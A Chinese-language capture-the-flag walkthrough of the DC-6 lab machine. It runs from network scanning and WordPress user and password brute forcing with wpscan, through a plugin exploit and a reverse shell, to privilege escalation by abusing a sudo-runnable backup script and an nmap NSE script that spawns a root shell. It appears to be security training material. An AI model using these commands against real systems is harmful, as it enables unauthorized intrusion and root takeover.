先去看看DC-6的官网描述,看看有没有给出提示信息
把这个线索信息先复制下来
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
开始前先要吧 kali和DC-6靶机放在统一网段,都换成NAT
模式
然后看一下DC-6的MAC地址
靶机的MAC地址00:0C:29:FA:57:22
主机扫描
netdiscover -r 192.168.80.0/24
端口扫描
nmap -A -T4 -p- 192.168.80.140
发现靶机开起来80
端口和22
端口
根据DC-6靶场的文档描述,需要修改hosts文件
vim /etc/hosts #靶机的地址和域名映射
通过kali自带的浏览器访问靶机的80
的端口
发现是WordPress
的站点,这跟DC-2
的是一样的站点,那就可以跟DC-2
一样用wpscan
来扫描这个站点的漏洞
先爆破一下目录看看
dirsearch -u 192.168.80.140 -i 200
使用御剑爆破一下
进入登录页面,现在还不知道密码和账户,
使用wpscan
进行枚举爆破用户名
wpscan --url http://wordy/ -e u # 枚举 WordPress 站点中注册过的用户名,来制作用户名字典。
把账户写进/tmp/user.txt
文件里
现在有了账户,还没密码,需要用靶场文档描述里说的线索提示
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
报错说没有目录,可以使用cd
命令,过去看一看
gunzip rockyou.txt.gz
现在有了用户字典,有了密码字典,继续使用wpscan
密码爆破
==注意==:是在/tmp
目录下进行爆破
wpscan --url http://wordy/ -U user.txt -P passwords.txt # 调用相关的字典文件对网站进行爆破。
爆破完用mark
helpdesk01
做登录
搜索Activity monitor
这个插件有没有漏洞
找一下漏洞的绝对路径
用python执行这个脚本
新建一个终端,监听8989
然后在刚才的终端里输入反弹shell
已经监听到了
使用python交互shell
python -c "import pty;pty.spawn('/bin/bash')"
在mark的家目录里发现有用的信息
查看su graham
切换用户,发现可以使用su
这个命令
使用sudo -l
查看能使用哪些root
权限的命令
切换到jens
的家目录看一下
可以往里面追加/bin/bash
使用sudo -u jens ./backups.sh
- -u 指定用户
切换到了jens
用户
继续使用sudo -l
查看
利用 nmap 提权
echo "os.execute('/bin/bash')" > shell.nse
sudo -u root nmap --script=shell.nse
#以root用户执行namp脚本
进入/root
下查看有无文件